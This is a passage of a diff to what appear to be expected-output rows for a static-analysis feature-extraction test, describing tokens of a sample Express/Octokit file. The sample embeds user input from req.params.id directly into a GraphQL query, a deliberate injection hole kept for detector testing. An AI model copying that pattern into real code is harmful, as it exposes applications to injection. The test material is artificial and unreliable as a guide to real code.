autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:10:4:16 | Octokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:25:4:39 | "@octokit/core" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:25:4:39 | "@octokit/core" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:25:4:39 | "@octokit/core" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:9 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:9 | kit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:9 | kit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:9 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:25 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:25 | kit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:25 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:25 | kit = new Octokit() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:25 | kit = new Octokit() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:7:5:25 | kit = new Octokit() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:13:5:25 | exceptional return of new Octokit() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:13:5:25 | exceptional return of new Octokit() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:13:5:25 | exceptional return of new Octokit() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:13:5:25 | new Octokit() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:13:5:25 | new Octokit() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:13:5:25 | new Octokit() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:17:5:23 | Octokit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:17:5:23 | Octokit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:5:17:5:23 | Octokit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:7:3 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:7:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:7:3 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:7:7 | app.get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:7:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:7:7 | app.get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:21:2 | app.get ... `);\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:21:2 | app.get ... `);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:21:2 | app.get ... `);\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:21:2 | exceptional return of app.get ... `);\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:21:2 | exceptional return of app.get ... `);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:1:21:2 | exceptional return of app.get ... `);\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:5:7:7 | get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:5:7:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:5:7:7 | get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:9:7:19 | '/post/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:9:7:19 | '/post/:id' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:9:7:19 | '/post/:id' | calleeImports | express | @@ -169,6 +1202,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:9:7:19 | '/post/:id' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:9:7:19 | '/post/:id' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:9:7:19 | '/post/:id' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | kit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | kit | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | kit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | this | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:7:21 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | 'arguments' object of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | exceptional return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | exceptional return of anonymous function | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | exceptional return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | functio ... `);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | functio ... `);\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | functio ... `);\\n} | calleeImports | express | @@ -176,6 +1229,101 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | functio ... `);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | functio ... `);\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | functio ... `);\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | return of anonymous function | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:22:21:1 | return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:31:7:33 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:36:7:38 | res | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:36:7:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:36:7:38 | res | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:36:7:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:7:36:7:38 | res | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:12 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:12 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:12 | id | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:12 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:12 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id = req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id = req.params.id | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:11:8:28 | id = req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:18 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:18 | req | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:18 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:25 | req.params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:25 | req.params | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:25 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:25 | req.params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:28 | req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:28 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:28 | req.params.id | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:28 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:16:8:28 | req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:20:8:25 | params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:20:8:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:20:8:25 | params | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:20:8:25 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:20:8:25 | params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:27:8:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:27:8:28 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:27:8:28 | id | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:27:8:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:8:27:8:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:10:18 | response | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:10:18 | response | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:10:18 | response | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:10:18 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:10:18 | response | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:20:6 | respons ... \\n `) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:20:6 | respons ... \\n `) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:20:6 | respons ... \\n `) | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:20:6 | respons ... \\n `) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:11:20:6 | respons ... \\n `) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:24 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:24 | kit | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:24 | kit | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:24 | kit | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:24 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:32 | kit.graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:32 | kit.graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:32 | kit.graphql | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:32 | kit.graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:10:32 | kit.graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | exceptional return of kit.gra ... \\n `) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | exceptional return of kit.gra ... \\n `) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | exceptional return of kit.gra ... \\n `) | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | exceptional return of kit.gra ... \\n `) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | exceptional return of kit.gra ... \\n `) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | kit.gra ... \\n `) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | kit.gra ... \\n `) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | kit.gra ... \\n `) | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | kit.gra ... \\n `) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:22:20:6 | kit.gra ... \\n `) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:26:10:32 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:26:10:32 | graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:26:10:32 | graphql | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:26:10:32 | graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:26:10:32 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:34:20:5 | `\\n ... }\\n ` | CalleeFlexibleAccessPath | kit.graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:34:20:5 | `\\n ... }\\n ` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:34:20:5 | `\\n ... }\\n ` | calleeImports | @octokit/core | @@ -185,6 +1333,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:34:20:5 | `\\n ... }\\n ` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:34:20:5 | `\\n ... }\\n ` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:34:20:5 | `\\n ... }\\n ` | receiverName | kit | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:35:12:43 | \\n ... name: " | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:35:12:43 | \\n ... name: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:35:12:43 | \\n ... name: " | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:35:12:43 | \\n ... name: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:35:12:43 | \\n ... name: " | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:10:35:12:43 | \\n ... name: " | stringConcatenatedWith | -endpoint- id + '") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n ' | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:46:12:47 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:46:12:47 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:46:12:47 | id | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n 